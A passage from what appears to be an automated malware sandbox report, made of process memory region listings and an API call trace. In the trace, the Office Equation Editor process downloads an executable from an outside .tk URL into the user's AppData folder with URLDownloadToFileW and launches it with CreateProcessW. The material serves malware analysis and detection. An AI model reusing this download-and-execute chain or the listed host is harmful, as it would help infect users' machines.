region_type = mapped_file name = "urlmon.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\urlmon.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\urlmon.dll.mui") Region: id = 628 start_va = 0x3a70000 end_va = 0x3b6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003a70000" filename = "" Region: id = 629 start_va = 0x3e0000 end_va = 0x3effff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "index.dat" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\index.dat" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\temporary internet files\\content.ie5\\index.dat") Region: id = 630 start_va = 0x3f0000 end_va = 0x3f7fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "index.dat" filename = "\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\index.dat" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\cookies\\index.dat") Region: id = 631 start_va = 0x4d0000 end_va = 0x4dffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "index.dat" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\index.dat" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\history\\history.ie5\\index.dat") Region: id = 632 start_va = 0x4e0000 end_va = 0x51ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "index.dat" filename = "\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\IETldCache\\index.dat" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\ietldcache\\index.dat") Region: id = 633 start_va = 0x520000 end_va = 0x521fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000520000" filename = "" Region: id = 634 start_va = 0x744d0000 end_va = 0x7466dfff monitored = 0 entry_point = 0x744fe6b5 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll") Region: id = 635 start_va = 0x530000 end_va = 0x530fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "windowsshell.manifest" filename = "\\Windows\\WindowsShell.Manifest" (normalized: "c:\\windows\\windowsshell.manifest") Region: id = 636 start_va = 0x550000 end_va = 0x551fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 637 start_va = 0x76200000 end_va = 0x76234fff monitored = 0 entry_point = 0x7620145d region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll") Region: id = 638 start_va = 0x774b0000 end_va = 0x774b5fff monitored = 0 entry_point = 0x774b1782 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\SysWOW64\\nsi.dll" (normalized: "c:\\windows\\syswow64\\nsi.dll") Region: id = 639 start_va = 0x74440000 end_va = 0x74483fff monitored = 0 entry_point = 0x744563f9 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\SysWOW64\\dnsapi.dll" (normalized: "c:\\windows\\syswow64\\dnsapi.dll") Region: id = 640 start_va = 0x3c00000 end_va = 0x3c3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003c00000" filename = "" Region: id = 641 start_va = 0x74410000 end_va = 0x74416fff monitored = 0 entry_point = 0x7441128d region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\SysWOW64\\winnsi.dll" (normalized: "c:\\windows\\syswow64\\winnsi.dll") Region: id = 642 start_va = 0x74420000 end_va = 0x7443bfff monitored = 0 entry_point = 0x7442a431 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\SysWOW64\\IPHLPAPI.DLL" (normalized: "c:\\windows\\syswow64\\iphlpapi.dll") Region: id = 643 start_va = 0x74220000 end_va = 0x74234fff monitored = 0 entry_point = 0x742212de region_type = mapped_file name = "rasman.dll" filename = "\\Windows\\SysWOW64\\rasman.dll" (normalized: "c:\\windows\\syswow64\\rasman.dll") Region: id = 644 start_va = 0x74240000 end_va = 0x74291fff monitored = 0 entry_point = 0x742414be region_type = mapped_file name = "rasapi32.dll" filename = "\\Windows\\SysWOW64\\rasapi32.dll" (normalized: "c:\\windows\\syswow64\\rasapi32.dll") Region: id = 645 start_va = 0x74210000 end_va = 0x7421cfff monitored = 0 entry_point = 0x74211326 region_type = mapped_file name = "rtutils.dll" filename = "\\Windows\\SysWOW64\\rtutils.dll" (normalized: "c:\\windows\\syswow64\\rtutils.dll") Region: id = 646 start_va = 0x530000 end_va = 0x530fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 647 start_va = 0x560000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000560000" filename = "" Region: id = 648 start_va = 0x3c40000 end_va = 0x3d3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003c40000" filename = "" Region: id = 649 start_va = 0x74200000 end_va = 0x74205fff monitored = 0 entry_point = 0x7420125a region_type = mapped_file name = "sensapi.dll" filename = "\\Windows\\SysWOW64\\SensApi.dll" (normalized: "c:\\windows\\syswow64\\sensapi.dll") Region: id = 650 start_va = 0x7efa7000 end_va = 0x7efa9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efa7000" filename = "" Region: id = 651 start_va = 0x2cb0000 end_va = 0x2ceffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002cb0000" filename = "" Region: id = 652 start_va = 0x3d40000 end_va = 0x3e3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d40000" filename = "" Region: id = 653 start_va = 0x743c0000 end_va = 0x743fbfff monitored = 0 entry_point = 0x743c145d region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\SysWOW64\\mswsock.dll" (normalized: "c:\\windows\\syswow64\\mswsock.dll") Region: id = 654 start_va = 0x7efa4000 end_va = 0x7efa6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efa4000" filename = "" Region: id = 655 start_va = 0x743b0000 end_va = 0x743b4fff monitored = 0 entry_point = 0x743b15df region_type = mapped_file name = "wshtcpip.dll" filename = "\\Windows\\SysWOW64\\WSHTCPIP.DLL" (normalized: "c:\\windows\\syswow64\\wshtcpip.dll") Region: id = 656 start_va = 0x5a0000 end_va = 0x5a0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005a0000" filename = "" Region: id = 657 start_va = 0x741f0000 end_va = 0x741fffff monitored = 0 entry_point = 0x741f38c1 region_type = mapped_file name = "nlaapi.dll" filename = "\\Windows\\SysWOW64\\nlaapi.dll" (normalized: "c:\\windows\\syswow64\\nlaapi.dll") Region: id = 658 start_va = 0x77120000 end_va = 0x77122fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "normaliz.dll" filename = "\\Windows\\SysWOW64\\normaliz.dll" (normalized: "c:\\windows\\syswow64\\normaliz.dll") Region: id = 659 start_va = 0x3f00000 end_va = 0x3f0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003f00000" filename = "" Region: id = 660 start_va = 0x4100000 end_va = 0x410ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004100000" filename = "" Region: id = 661 start_va = 0x74310000 end_va = 0x74315fff monitored = 0 entry_point = 0x743114b2 region_type = mapped_file name = "rasadhlp.dll" filename = "\\Windows\\SysWOW64\\rasadhlp.dll" (normalized: "c:\\windows\\syswow64\\rasadhlp.dll") Region: id = 662 start_va = 0x743a0000 end_va = 0x743a5fff monitored = 0 entry_point = 0x743a1673 region_type = mapped_file name = "wship6.dll" filename = "\\Windows\\SysWOW64\\wship6.dll" (normalized: "c:\\windows\\syswow64\\wship6.dll") Region: id = 663 start_va = 0x742d0000 end_va = 0x74307fff monitored = 0 entry_point = 0x742d990e region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\SysWOW64\\FWPUCLNT.DLL" (normalized: "c:\\windows\\syswow64\\fwpuclnt.dll") Region: id = 664 start_va = 0x3f10000 end_va = 0x3ffffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003f10000" filename = "" Region: id = 665 start_va = 0x5b0000 end_va = 0x5b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005b0000" filename = "" Region: id = 666 start_va = 0x2530000 end_va = 0x2540fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "c_20127.nls" filename = "\\Windows\\System32\\C_20127.NLS" (normalized: "c:\\windows\\system32\\c_20127.nls") Region: id = 667 start_va = 0x3b70000 end_va = 0x3baffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003b70000" filename = "" Region: id = 668 start_va = 0x4000000 end_va = 0x40fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004000000" filename = "" Region: id = 669 start_va = 0x67950000 end_va = 0x67999fff monitored = 1 entry_point = 0x67952e54 region_type = mapped_file name = "mscoree.dll" filename = "\\Windows\\SysWOW64\\mscoree.dll" (normalized: "c:\\windows\\syswow64\\mscoree.dll") Region: id = 670 start_va = 0x7efa1000 end_va = 0x7efa3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efa1000" filename = "" Region: id = 671 start_va = 0x3e40000 end_va = 0x3efffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003e40000" filename = "" Region: id = 672 start_va = 0x4110000 end_va = 0x431ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004110000" filename = "" Region: id = 673 start_va = 0x678c0000 end_va = 0x6794cfff monitored = 1 entry_point = 0x678d2860 region_type = mapped_file name = "mscoreei.dll" filename = "\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscoreei.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\mscoreei.dll") Region: id = 674 start_va = 0x3e40000 end_va = 0x3ec4fff monitored = 0 entry_point = 0x3e8cd40 region_type = mapped_file name = "eqnedt32.exe" filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX86\\Microsoft Shared\\EQUATION\\eqnedt32.exe" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilescommonx86\\microsoft shared\\equation\\eqnedt32.exe") Region: id = 675 start_va = 0x3ef0000 end_va = 0x3efffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003ef0000" filename = "" Region: id = 676 start_va = 0x664d0000 end_va = 0x66a7afff monitored = 1 entry_point = 0x66523dc0 region_type = mapped_file name = "mscorwks.dll" filename = "\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\mscorwks.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v2.0.50727\\mscorwks.dll") Region: id = 677 start_va = 0x65f20000 end_va = 0x664cafff monitored = 1 entry_point = 0x65f73dc0 region_type = mapped_file name = "mscorwks.dll" filename = "\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\mscorwks.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v2.0.50727\\mscorwks.dll") Region: id = 678 start_va = 0x72ce0000 end_va = 0x72d3efff monitored = 0 entry_point = 0x72ce2134 region_type = mapped_file name = "sxs.dll" filename = "\\Windows\\SysWOW64\\sxs.dll" (normalized: "c:\\windows\\syswow64\\sxs.dll") Region: id = 694 start_va = 0x3e40000 end_va = 0x3ed8fff monitored = 1 entry_point = 0x3ed9786 region_type = mapped_file name = "ibeframnk863.exe" filename = "\\Users\\kEecfMwgj\\AppData\\Roaming\\ibeframnk863.exe" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\ibeframnk863.exe") Thread: id = 15 os_tid = 0xe04 [0065.153] GlobalLock (hMem=0x24b0074) returned 0x69a048 [0065.154] GetProcAddress (hModule=0x772b0000, lpProcName="ExpandEnvironmentStringsW") returned 0x772c412b [0065.154] ExpandEnvironmentStringsW (in: lpSrc="%APPDATA%\\ibeframnk863.exe", lpDst=0x18ef60, nSize=0x104 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\ibeframnk863.exe") returned 0x34 [0065.154] LoadLibraryW (lpLibFileName="UrlMon") returned 0x75470000 [0065.173] GetProcAddress (hModule=0x75470000, lpProcName="URLDownloadToFileW") returned 0x755066f6 [0065.245] URLDownloadToFileW (param_1=0x0, param_2="http://fantecheo.tk/ibefrankszx.exe", param_3="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\ibeframnk863.exe" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\ibeframnk863.exe"), param_4=0x0, param_5=0x0) returned 0x0 [0067.944] GetProcAddress (hModule=0x772b0000, lpProcName="GetStartupInfoW") returned 0x772c4cf8 [0067.944] GetStartupInfoW (in: lpStartupInfo=0x18f180 | out: lpStartupInfo=0x18f180*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Program Files (x86)\\Microsoft Office\\Root\\VFS\\ProgramFilesCommonX86\\Microsoft Shared\\EQUATION\\EQNEDT32.EXE", dwX=0x28, dwY=0x28, dwXSize=0x50, dwYSize=0x28, dwXCountChars=0xf6eae8, dwYCountChars=0x0, dwFillAttribute=0xf6ead4, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x18f1a0, hStdOutput=0x318bd1f7, hStdError=0x18f9f0)) [0067.945] GetProcAddress (hModule=0x772b0000, lpProcName="CreateProcessW") returned 0x772c103d [0067.945] CreateProcessW (in: lpApplicationName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\ibeframnk863.exe", lpCommandLine=0x0, lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x18f180*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Program Files (x86)\\Microsoft Office\\Root\\VFS\\ProgramFilesCommonX86\\Microsoft Shared\\EQUATION\\EQNEDT32.EXE", dwX=0x28, dwY=0x28, dwXSize=0x50, dwYSize=0x28, dwXCountChars=0xf6eae8, dwYCountChars=0x0, dwFillAttribute=0xf6ead4, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x18f1a0, hStdOutput=0x318bd1f7, hStdError=0x18f9f0), lpProcessInformation=0x18f1c4 | out: lpCommandLine=0x0, lpProcessInformation=0x18f1c4*(hProcess=0x3e0, hThread=0x3dc, dwProcessId=0xe24, dwThreadId=0xe28)) returned 1 [0068.016] GetProcAddress (hModule=0x772b0000, lpProcName="ExitProcess") returned 0x772c79c8 [0068.016] ExitProcess (uExitCode=0x0) Thread: id = 16 os_tid = 0xe08 Thread: id = 17 os_tid = 0xe0c Thread: id = 18 os_tid = 0xe10 Thread: id = 19 os_tid = 0xe14 Thread: id = 20 os_tid = 0xe18 Thread: id = 21 os_tid = 0xe1c Thread: id = 22 os_tid = 0xe20 Process: id = "3" image_name = "ibeframnk863.exe" filename = "c:\\users\\keecfmwgj\\appdata\\roaming\\ibeframnk863.exe" page_root = "0x3c8b0000" os_pid = "0xe24" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0xe00" cmd_line = "\"C:\\Users\\kEecfMwgj\\AppData\\Roaming\\ibeframnk863.exe\"" cur_dir = "C:\\Windows\\system32\\" os_username = "Q9IATRKPRH\\kEecfMwgj" bitness = "32" os_groups = "Q9IATRKPRH\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e957" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 679 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 680 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 681 start_va = 0x40000 end_va = 0x40fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 682 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 683 start_va = 0xf0000 end_va = 0x1effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 684 start_va = 0x1250000 end_va = 0x12edfff monitored = 1 entry_point = 0x12e9786 region_type = mapped_file name = "ibeframnk863.exe" filename = "\\Users\\kEecfMwgj\\AppData\\Roaming\\ibeframnk863.exe" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\ibeframnk863.exe") Region: id = 685 start_va = 0x776e0000 end_va = 0x77888fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 686 start_va = 0x778c0000 end_va = 0x77a3ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 687 start_va = 0x7efb0000 end_va = 0x7efd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efb0000" filename = "" Region: id = 688 start_va = 0x7efdb000 end_va = 0x7efddfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efdb000" filename = "" Region: id = 689 start_va = 0x7efde000 end_va = 0x7efdefff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efde000" filename = "" Region: id = 690 start_va = 0x7efdf000 end_va = 0x7efdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efdf000" filename = "" Region: id = 691 start_va = 0x7efe0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 692 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 693 start_va = 0x7fff0000 end_va = 0x7fffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 695 start_va = 0x50000 end_va = 0x53fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 696 start_va = 0xa0000 end_va = 0xa0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000a0000" filename = "" Region: id = 697 start_va = 0x2a0000 end_va = 0x31ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 698 start_va = 0x75130000 end_va = 0x75137fff monitored = 0 entry_point = 0x751320f8 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 699 start_va = 0x75140000 end_va = 0x7519bfff monitored = 0 entry_point = 0x7517f9f4 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 700 start_va = 0x751a0000 end_va = 0x751defff monitored = 0 entry_point = 0x751ce088 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 701 start_va = 0x774c0000 end_va = 0x775defff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000774c0000" filename = "" Region: id = 702 start_va = 0x775e0000 end_va = 0x776d9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000775e0000" filename = "" Region: id = 703 start_va = 0x320000 end_va = 0x4cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000320000" filename = "" Region: id = 704 start_va = 0x67950000 end_va = 0x67999fff monitored = 1 entry_point = 0x67952e54 region_type = mapped_file name = "mscoree.dll" filename = "\\Windows\\SysWOW64\\mscoree.dll" (normalized: "c:\\windows\\syswow64\\mscoree.dll") Region: id = 705 start_va = 0x772b0000 end_va = 0x773bffff monitored = 0 entry_point = 0x772c3283 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 706 start_va = 0x773e0000 end_va = 0x77426fff monitored = 0 entry_point = 0x773e74c1 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 707 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 708 start_va = 0x7efe0000 end_va = 0x7f0dffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 709 start_va = 0x7f0e0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 710 start_va = 0xb0000 end_va = 0xeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000b0000" filename = "" Region: id = 711 start_va = 0x1f0000 end_va = 0x256fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 712 start_va = 0x4d0000 end_va = 0x63ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004d0000" filename = "" Region: id = 713 start_va = 0x77180000 end_va = 0x7721ffff monitored = 0 entry_point = 0x771949e5 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 714 start_va = 0x76b90000 end_va = 0x76c3bfff monitored = 0 entry_point = 0x76b9a472 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 715 start_va = 0x77490000 end_va = 0x774a8fff monitored = 0 entry_point = 0x77494975 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 716 start_va = 0x769e0000 end_va = 0x76acffff monitored = 0 entry_point = 0x769f0569 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 717 start_va = 0x75410000 end_va = 0x7546ffff monitored = 0 entry_point = 0x7542a3b3 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 718 start_va = 0x75400000 end_va = 0x7540bfff monitored = 0 entry_point = 0x754010e1 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 719 start_va = 0x4d0000 end_va = 0x5cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004d0000" filename = "" Region: id = 720 start_va = 0x600000 end_va = 0x63ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000600000" filename = "" Region: id = 721 start_va = 0x678c0000 end_va = 0x6794cfff monitored = 1 entry_point = 0x678d2860 region_type = mapped_file name = "mscoreei.dll" filename = "\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscoreei.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\mscoreei.dll") Region: id = 722 start_va = 0x73430000 end_va = 0x73432fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "api-ms-win-core-synch-l1-2-0.dll" filename = "\\Windows\\SysWOW64\\api-ms-win-core-synch-l1-2-0.dll" (normalized: "c:\\windows\\syswow64\\api-ms-win-core-synch-l1-2-0.dll") Region: id = 723 start_va = 0x76850000 end_va = 0x768a6fff monitored = 0 entry_point = 0x76869ba6 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 724 start_va = 0x76270000 end_va = 0x762fffff monitored = 0 entry_point = 0x76286343 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 725 start_va = 0x766d0000 end_va = 0x767cffff monitored = 0 entry_point = 0x766eb6ed region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 726 start_va = 0x77890000 end_va = 0x77899fff monitored = 0 entry_point = 0x778936a0 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\SysWOW64\\lpk.dll" (normalized: "c:\\windows\\syswow64\\lpk.dll") Region: id = 727 start_va = 0x76300000 end_va = 0x7639cfff monitored = 0 entry_point = 0x76333fd7 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\SysWOW64\\usp10.dll" (normalized: "c:\\windows\\syswow64\\usp10.dll") Region: id = 728 start_va = 0x20000 end_va = 0x3dfff monitored = 0 entry_point = 0x3158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 729 start_va = 0x640000 end_va = 0x7c7fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000640000" filename = "" Region: id = 730 start_va = 0x20000 end_va = 0x3dfff monitored = 0 entry_point = 0x3158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 731 start_va = 0x77430000 end_va = 0x7748ffff monitored = 0 entry_point = 0x7744158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 732 start_va = 0x77050000 end_va = 0x7711bfff monitored = 0 entry_point = 0x7705168b region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 733 start_va = 0x7d0000 end_va = 0x950fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007d0000" filename = "" Region: id = 734 start_va = 0x12f0000 end_va = 0x26effff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000012f0000" filename = "" Region: id = 735 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 736 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 737 start_va = 0x320000 end_va = 0x3b8fff monitored = 1 entry_point = 0x3b9786 region_type = mapped_file name = "ibeframnk863.exe" filename = "\\Users\\kEecfMwgj\\AppData\\Roaming\\ibeframnk863.exe" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\ibeframnk863.exe") Region: id = 738 start_va = 0x3d0000 end_va = 0x4cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000003d0000" filename = "" Region: id = 739 start_va = 0x320000 end_va = 0x3b8fff monitored = 1 entry_point = 0x3b9786 region_type = mapped_file name = "ibeframnk863.exe" filename = "\\Users\\kEecfMwgj\\AppData\\Roaming\\ibeframnk863.exe" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\ibeframnk863.exe") Region: id = 740 start_va = 0x74400000 end_va = 0x74408fff monitored = 0 entry_point = 0x74401220 region_type = mapped_file name = "version.dll" filename = "\\Windows\\SysWOW64\\version.dll" (normalized: "c:\\windows\\syswow64\\version.dll") Region: id = 807 start_va = 0x662d0000 end_va = 0x66a7efff monitored = 1 entry_point = 0x662ed0d0 region_type = mapped_file name = "clr.dll" filename = "\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\clr.dll") Region: id = 819 start_va = 0x65b20000 end_va = 0x662cefff monitored = 1 entry_point = 0x65b3d0d0 region_type = mapped_file name = "clr.dll" filename = "\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\clr.dll") Region: id = 820 start_va = 0x662d0000 end_va = 0x66a7efff monitored = 1 entry_point = 0x662ed0d0 region_type = mapped_file name = "clr.dll" filename = "\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll" (normalized: 